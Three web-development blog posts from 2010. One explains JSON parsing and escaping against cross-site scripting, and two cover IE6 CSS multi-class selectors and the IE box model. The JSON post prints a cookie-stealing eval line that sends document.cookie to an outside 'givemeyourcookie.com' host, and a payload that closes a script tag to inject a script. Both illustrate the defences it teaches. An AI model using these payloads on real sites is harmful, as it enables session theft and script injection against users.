Saturday, September 18, 2010

JSON parsing, encoding, and security

JSON is, for practical purposes, a subset of JavaScript. Unlike other data formats such as XML, JSON can be used in JavaScript with very little effort. This is the main reason why JSON is so popular among web developers.

A JSON string such as '{"name": "David"}' can be passed to the eval function. eval calls the JavaScript interpreter and converts the string into a JavaScript object: {name: 'David'}. (eval would also accept looser text such as "{name: 'David'}", which is a valid JavaScript object literal but not valid JSON.)

var jsonStr = '{"name": "David"}';
var jsonObj = eval( "(" + jsonStr + ")" );
// jsonObj will be {name: 'David'}

This all looks easy. However, here comes the problem: eval will execute whatever is passed in. If jsonStr is "alert('Gotcha');", eval("alert('Gotcha');") will actually execute the alert call. This opens the door wide to cross-site scripting (XSS) attacks. For example, consider the following string passed to eval:

eval(
  '(new Image()).src = ' +
  '"http://www.givemeyourcookie.com/steal_cookie?cookie=" + ' +
  'escape(document.cookie);'
)

The above code will send your cookie to givemeyourcookie.com.
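The same effect can be seen without touching any cookies. The sketch below uses a made-up payload that only records that it ran; the names log and payload are illustrative and not part of any library.

```javascript
// Records side effects so we can observe what eval actually executed.
var log = [];

// An attacker-controlled string that is code, not data.
var payload = "log.push('payload ran')";

// The same "(" + ... + ")" wrapping that is used for JSON strings.
var result = eval("(" + payload + ")");

console.log(log);    // the payload's side effect shows up here
console.log(result); // the return value of push, not a data object
```

Nothing in the wrapping pattern distinguishes data from code, which is why any string that reaches eval has to be trusted completely.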

To fix this vulnerability, use a JSON parser to convert strings into objects. In browsers that provide native JSON support, the parser can be even faster than eval.

Like eval, a JSON parser takes a string and outputs an object. The difference is that the parser accepts the string only if it is valid JSON. For example, the JSON parser from the YUI JavaScript library will throw a SyntaxError if the string contains anything that violates JSON syntax.

var jsonStr = 'alert("Gotcha"); {"name" : "David"}';
var jsonObj = YAHOO.lang.JSON.parse(jsonStr); // SyntaxError

With a correct JSON string, the following code will run.

var jsonStr = '{"name" : "David"}';
var jsonObj = YAHOO.lang.JSON.parse(jsonStr);
alert(jsonObj.name); // Alerts "David"
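In browsers and runtimes with native JSON support, the built-in JSON.parse behaves the same way for these inputs. The sketch below wraps it in a small helper; parseOrNull is a hypothetical name used only here, and returning null on failure is just one possible convention (it cannot tell a failed parse apart from the valid JSON text "null").

```javascript
// Returns the parsed value, or null when the text is not valid JSON.
function parseOrNull(text) {
  try {
    return JSON.parse(text);
  } catch (e) {
    if (e instanceof SyntaxError) {
      return null;
    }
    throw e; // anything else is unexpected, so let it propagate
  }
}

var good = parseOrNull('{"name" : "David"}');
var bad = parseOrNull('alert("Gotcha"); {"name" : "David"}');
var literal = parseOrNull("{name: 'David'}");

console.log(good.name); // David
console.log(bad);       // null
console.log(literal);   // null
```

The last call shows that strict JSON also rejects unquoted keys and single-quoted strings, even though eval would accept them.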

Using a JSON parser certainly solves the eval problem. However, this is only half of the story. We web developers usually use a server-side technology such as PHP or JSP to embed dynamic parts into a page. When we do that, we need to be careful about what we embed.

<script type="text/javascript">
  var jsonObj = 
    YAHOO.lang.JSON.parse('<s:property value="userProfile" />');
</script>

<s:property> is a tag from Struts 2 (a popular Java MVC framework). It fetches a property, in this case a string representation of a userProfile, and writes it into the page. Here the property lands between a pair of single quotes, so it becomes a JavaScript string literal. The parse function then converts this string into an object.

This will work fine if the userProfile property is a normal user profile:

<script type="text/javascript">
  // userProfile property is { "name": "David", "hobby": "Blogging" }. 
  var jsonObj = 
    YAHOO.lang.JSON.parse('{ "name": "David", "hobby": "Blogging" }');
</script>

However, the code will break if the userProfile property is:

{ "name": "David", "hobby": "Blogging in Peet's Coffee" }

The single quote in "Blogging in Peet's Coffee" will prematurely terminate the string, which breaks the JavaScript syntax.

<script type="text/javascript">
  // { "name": "David", "hobby": "Blogging in Peet's Coffee" }. 
  var jsonObj = YAHOO.lang.JSON.parse(
    '{ "name": "David", "hobby": "Blogging in Peet' // Broken
    s Coffee" }');
</script>

Things could be even worse when userProfile is something like this:

{ "name": "David", "hobby": ""}');alert("Evil script goes here");</script>"}

Pass this property to the parse function, and you will get:

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse(
    '{ "name": "David", "hobby": ""}');alert("Evil script goes here");</script>"}');
</script>

This is equivalent to:

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse('{ "name": "David", "hobby": ""}');
  alert("Evil script goes here");
</script>
"}');
</script>

The above code will run even though the second </script> tag has no matching <script> tag. It's pretty scary that a raw JSON string could introduce such an XSS attack into your web application, isn't it?
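The injection can be reproduced outside a browser. In the sketch below, renderNaively is a hypothetical stand-in for the server-side template, and firstScriptBody only approximates how a browser finds the end of a script block (it stops at the first closing script tag, wherever that tag came from).

```javascript
// Hypothetical stand-in for the server-side template: it pastes the
// property between single quotes without escaping anything.
function renderNaively(userProfile) {
  return '<script type="text/javascript">\n' +
         "  var jsonObj = YAHOO.lang.JSON.parse('" + userProfile + "');\n" +
         "</script>";
}

// Approximates what the browser treats as the script body: everything
// between the opening tag and the first closing script tag.
function firstScriptBody(html) {
  var start = html.indexOf(">") + 1;
  var end = html.indexOf("</script>");
  return html.substring(start, end).trim();
}

var evil = '{ "name": "David", "hobby": ""}\');' +
           'alert("Evil script goes here");</script>"}';

// Prints the parse call followed by the injected alert call.
console.log(firstScriptBody(renderNaively(evil)));
```

The attacker's closing tag wins because the HTML parser looks for it before the JavaScript engine ever sees the string literal.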

To fix the problem, we need to escape the single quote. We can use the Unicode escape \u0027 (equivalent to the character ').

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse(
      '{ "name": "David", "hobby": "Blogging in Peet\u0027s Coffee" }');
</script>

In the real world, all user input and database data must be escaped for JavaScript strings if they are embedded directly into JavaScript or event handler attributes (e.g. onclick). The single quote is just one of the characters that we need to escape. Here is a list of such characters and their escapes.

Character   Escape    Description
\           \\        Backslash
"           \u0022    Double quote
'           \u0027    Single quote
<           \u003c    Less than
>           \u003e    Greater than
=           \u003d    Equals
&           \u0026    Ampersand

I created a Java utility class to escape all these characters. The essential part looks like this:

import java.util.LinkedHashMap;
import java.util.Map;

// The class name is a placeholder for this excerpt.
public final class JavaScriptEscapeUtil
{
  // A map of characters and their escapes.
  // LinkedHashMap keeps insertion order, which matters below.
  private static final Map<String, String> _mapChar2Escape =
    new LinkedHashMap<String, String>();

  static
  {
    // Be sure to have backslash at first.
    // We don't want to escape backslashes in escaped characters.
    _mapChar2Escape.put("\\", "\\\\");    // Backslash
    _mapChar2Escape.put("\"", "\\u0022"); // Double quote
    _mapChar2Escape.put("'", "\\u0027");  // Single quote
    _mapChar2Escape.put("&", "\\u0026");  // Ampersand
    _mapChar2Escape.put("<", "\\u003c");  // Less than
    _mapChar2Escape.put(">", "\\u003e");  // Greater than
    _mapChar2Escape.put("=", "\\u003d");  // Equals
  }

  /**
   * Returns a new string that has JavaScript literals escaped.
   *
   * @param strSource Source string
   * @return a copy of strSource with the mapped characters replaced by their escapes
   */
  public static String escapeJavaScript(String strSource)
  {
    String strEscaped = strSource;

    // Replace one character at a time, in map order (backslash first).
    for (Map.Entry<String, String> entry : _mapChar2Escape.entrySet())
    {
      strEscaped = strEscaped.replace(entry.getKey(), entry.getValue());
    }

    return strEscaped;
  }
}
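The same idea can be sketched in JavaScript, which also makes it easy to check that the escaping round-trips. This is not the Java class itself: it uses a single regular-expression pass instead of ordered replacements, and the name ESCAPES is made up for the example. Like the table, it does not deal with line breaks inside the value.

```javascript
// Same character-to-escape table as the Java map above.
var ESCAPES = {
  "\\": "\\\\",
  '"': "\\u0022",
  "'": "\\u0027",
  "&": "\\u0026",
  "<": "\\u003c",
  ">": "\\u003e",
  "=": "\\u003d"
};

// One pass over the input, so the order of the table no longer matters.
function escapeJavaScript(source) {
  return source.replace(/[\\"'&<>=]/g, function (ch) {
    return ESCAPES[ch];
  });
}

var profile = '{ "name": "David", "hobby": "Blogging in Peet\'s Coffee" }';
var escaped = escapeJavaScript(profile);

// These escapes are also valid JSON string escapes, so wrapping the result
// in double quotes and parsing it decodes the text the same way a
// JavaScript string literal would, without calling eval.
var decoded = JSON.parse('"' + escaped + '"');

console.log(escaped);
console.log(decoded === profile);       // true
console.log(JSON.parse(decoded).hobby); // Blogging in Peet's Coffee
```

Because the escaped text contains no quotes, angle brackets, or raw backslashes, it can sit between single quotes in a script block without ending the string or the script early.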

That's it.

Wednesday, September 1, 2010

IE6 multi class CSS selector weirdness

1. Problem


Multi-class CSS selectors such as ".green.bold" (no space in between) are commonly used in modern web styling. However, whenever you have something fun to play with, IE6 comes along to ruin it.

.bold { font-weight: bold; }
.green.bold { color: green; }
.blue.bold { color: blue; }

<p class="bold green">
    Green and bold
</p>
<p class="bold blue">
    Blue and bold
</p>

In other browsers such as Firefox, the above CSS and HTML will be rendered like this:

Green and bold    [rendered bold, green]

Blue and bold     [rendered bold, blue]

Now, be prepared for IE6 weirdness:

Green and bold    [rendered bold, blue]

Blue and bold     [rendered bold, blue]

That is how IE6 renders the above CSS. Let's take a closer look. Both lines are bold, which is right. However, the first line is blue when it should be green.

Although I don't have an official answer for this behavior, I have a theory that explains how the IE6 CSS parser works in this case. This is just my theory. I haven't verified it against any W3C documents.

2. Theory


The way that IE6 parses these ".green.bold" and ".blue.bold" CSS selectors can be explained like this:

When IE6 runs into a multi-class selector, e.g. ".green.bold", it recognizes only the last class, which is "bold". The preceding classes, such as "green", are ignored.

.green.bold { ... }

The above CSS rule will be parsed as

.bold { ... }

Now let's re-examine the CSS rules at the beginning of this article.

.bold { font-weight: bold; }
.green.bold { color: green; }
.blue.bold { color: blue; }

For IE6, this will be equivalent to:

.bold { font-weight: bold; }
.bold { color: green; }
.bold { color: blue; }

Please notice the last two lines. ".bold { color: green; }" precedes ".bold { color: blue; }", so blue overrides green. However, "font-weight: bold" in the first CSS rule is not overridden, because the later rules don't define a font weight.

The above CSS can be further simplified to:

.bold { font-weight: bold; color: blue; }

With the "parsed" CSS, we now understand why IE6 rendered our CSS and HTML as two blue bold lines.
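The theory can be modeled in a few lines. The sketch below is a toy cascade, not a real CSS engine: it handles class-only selectors, applies rules in source order, and ignores specificity (which is enough here because the more specific rules also come later). The function names are made up for the example.

```javascript
// Splits ".green.bold" into ["green", "bold"].
function classesOf(selector) {
  return selector.split(".").filter(function (name) {
    return name.length > 0;
  });
}

// Applies class-only rules in source order. With ie6 set to true, only the
// last class of each selector is checked, as the theory above suggests.
function computeStyle(rules, elementClasses, ie6) {
  var style = {};
  rules.forEach(function (rule) {
    var required = classesOf(rule.selector);
    if (ie6) {
      required = required.slice(-1);
    }
    var matches = required.every(function (name) {
      return elementClasses.indexOf(name) !== -1;
    });
    if (matches) {
      Object.keys(rule.declarations).forEach(function (prop) {
        style[prop] = rule.declarations[prop];
      });
    }
  });
  return style;
}

var rules = [
  { selector: ".bold", declarations: { "font-weight": "bold" } },
  { selector: ".green.bold", declarations: { color: "green" } },
  { selector: ".blue.bold", declarations: { color: "blue" } }
];

console.log(computeStyle(rules, ["bold", "green"], false)); // color: green
console.log(computeStyle(rules, ["bold", "green"], true));  // color: blue
```

In the IE6 mode every rule collapses to ".bold", so the last color declaration wins for both paragraphs.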

To test my theory, I changed the CSS rules a bit:

.bold { font-weight: bold; }
.green.bold { color: green; font-size: 24px; }
.blue.bold { color: blue; }

".green.bold" now sets the font size to 24px. Let's walk through it the way the IE6 CSS parser would.

Step 1:
.bold { font-weight: bold; }
.bold { color: green; font-size: 24px; }
.bold { color: blue; }

Step 2:
.bold { font-weight: bold; color: green; font-size: 24px; }
.bold { color: blue; }

Step 3:
.bold { font-weight: bold; color: blue; font-size: 24px; }

Try this in IE6, and the result will look like this:

Green and bold    [rendered bold, blue, 24px]

Blue and bold     [rendered bold, blue, 24px]

3. Solution


How do we fix this IE6 weirdness?

Because IE6 honors only the last class in a multi-class selector, we can move the more specific class to the end. So here we swap "green" and "bold" (and likewise "blue" and "bold"):

.bold { font-weight: bold; }
.bold.green { color: green; font-size: 24px; }
.bold.blue { color: blue; }

For IE6, this will be parsed as:

.bold { font-weight: bold; }
.green { color: green; font-size: 24px; }
.blue { color: blue; }

Now the result becomes:

Green and bold    [rendered bold, green, 24px]

Blue and bold     [rendered bold, blue]

However, in the real world, things won't be this simple. For example, this solution won't work in the 3-class case, e.g. ".class1.class2.class3". The styles that class2 defines will be lost unless you copy them from class2 to class3, which effectively turns it into a 2-class selector: .class1.class3
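If the theory holds, a stylesheet can be checked for rules that IE6 would merge. The helper below is a hypothetical sketch for class-only selectors: it reduces each selector to its last class and reports the groups that end up identical.

```javascript
// Reduces a selector to what IE6 appears to honor: its last class only.
function ie6EffectiveSelector(selector) {
  var parts = selector.split(".");
  return "." + parts[parts.length - 1];
}

// Groups selectors by their IE6-effective form and keeps the groups with
// more than one member, i.e. the rules that IE6 would treat as the same.
function findIe6Collisions(selectors) {
  var groups = {};
  selectors.forEach(function (selector) {
    var key = ie6EffectiveSelector(selector);
    (groups[key] = groups[key] || []).push(selector);
  });
  var collisions = {};
  Object.keys(groups).forEach(function (key) {
    if (groups[key].length > 1) {
      collisions[key] = groups[key];
    }
  });
  return collisions;
}

// Original order: all three rules collapse to ".bold".
console.log(findIe6Collisions([".bold", ".green.bold", ".blue.bold"]));
// Swapped order: no collisions are reported.
console.log(findIe6Collisions([".bold", ".bold.green", ".bold.blue"]));
// Three classes: only the last one survives.
console.log(ie6EffectiveSelector(".class1.class2.class3")); // .class3
```

A check like this only flags name collisions; it says nothing about whether the collapsed rule is acceptable, which still has to be judged case by case.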

HTML Box model, IE, and 100% width

An HTML box has margin, border, and padding surrounding its content area.  According to the W3C specification, the 'width' and 'height' CSS properties define only the width and height of the content area, not the box itself.  The box's padding, border, and margin are not considered part of the content area.

So the following CSS rule will render a 'myBox' DIV that takes up 150 pixels in width and height (margins included), although its CSS width and height are set to 100 pixels:

#myBox {
    width: 100px;
    height: 100px;
    padding: 10px;
    border: 5px solid; /* without a style, no border is drawn */
    margin: 10px;
}

box width = width + 2 * (padding + border + margin) = 100 + 2 * (10 + 5 + 10) = 150

However, IE has its own box model (IE 5.x, and later versions in quirks mode). It includes padding and border (but not margin) in width and height. So the above CSS rule will produce a box 120 pixels wide and high.

box width = width + 2 * margin = 100 + 2 * 10 = 120

Because the CSS width (100px) already includes padding (10px) and border (5px), the box's content area will be squeezed from 100 pixels to 70 pixels.

content width = width - 2 * (padding + border) = 100 - 2 * (10 + 5) = 70
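The three formulas above can be checked with a few lines of arithmetic. The function names are made up for this sketch, and all values are in pixels.

```javascript
var box = { width: 100, padding: 10, border: 5, margin: 10 };

// W3C model: CSS width is the content area; everything else is added on.
function standardBoxWidth(b) {
  return b.width + 2 * (b.padding + b.border + b.margin);
}

// Old IE model: CSS width already contains padding and border.
function ieBoxWidth(b) {
  return b.width + 2 * b.margin;
}

// Old IE model: what is left for the content itself.
function ieContentWidth(b) {
  return b.width - 2 * (b.padding + b.border);
}

console.log(standardBoxWidth(box)); // 150
console.log(ieBoxWidth(box));       // 120
console.log(ieContentWidth(box));   // 70
```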

This weird behavior can be fixed by declaring a doc type.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

The above doc type will force IE6 and later to honor the W3C standard and apply the CSS width only to the content area.

The standard W3C box model will give you headaches if you are not careful. For example, suppose we want a box to have 100% width and 10-pixel padding.

#myBox {
    width: 100%;
    padding: 10px;
}

This CSS rule makes the width of "myBox" 100% of its parent container's width. Let's say the parent's content area is 400 pixels wide. Since myBox's width is 100%, its content area will be 400 pixels wide, so you might think that the whole box will be 400 pixels wide. Is that true? What about the padding?

The actual width will be 400px plus 20px.

box width = 100% of parent's content width + 2 * padding = 100% * 400 + 2 * 10 = 420
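The same calculation as a small function makes the overflow explicit. paddedBoxWidth is a hypothetical helper; it leaves borders and margins out, as the example above does.

```javascript
// Outer width of a box under the W3C model: the percentage is resolved
// against the parent's width, and padding is added on both sides.
function paddedBoxWidth(parentWidth, widthPercent, padding) {
  var contentWidth = parentWidth * widthPercent / 100;
  return contentWidth + 2 * padding;
}

var parentWidth = 400;
var boxWidth = paddedBoxWidth(parentWidth, 100, 10);

console.log(boxWidth);               // 420
console.log(boxWidth - parentWidth); // 20 pixels of overflow
```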

420 pixels might not be what you want, because the box will be wider than its parent. In the real world, this issue might break your layout. To fix this problem, add an inner DIV inside myBox.

<div id="myBox">
    <div id="innerBox">
    </div>
</div>

And split the above CSS rule into two:

#myBox {
    width: 100%;
}
#innerBox {
    padding: 10px;
    /* Or you can use margin */
}

This makes sure that innerBox has 10px of padding and still fits in the 400px wide myBox.

The rule of thumb is not to mix percentage widths with padding or margins on the same element.
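Worked through with the same numbers, the nested version adds up as follows. This is plain arithmetic under the assumption that innerBox keeps its default width (auto), so its padding comes out of the available space instead of being added on top.

```javascript
var parentWidth = 400;
var padding = 10;

// #myBox: width 100%, no padding, so it is exactly as wide as its parent.
var myBoxWidth = parentWidth * 100 / 100;

// #innerBox: width is auto, so the content area shrinks to make room for
// the padding and the whole box still spans myBox exactly.
var innerContentWidth = myBoxWidth - 2 * padding;
var innerBoxWidth = innerContentWidth + 2 * padding;

console.log(myBoxWidth);        // 400
console.log(innerContentWidth); // 380
console.log(innerBoxWidth);     // 400
```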

Further reading on the box model: The Box Model Problem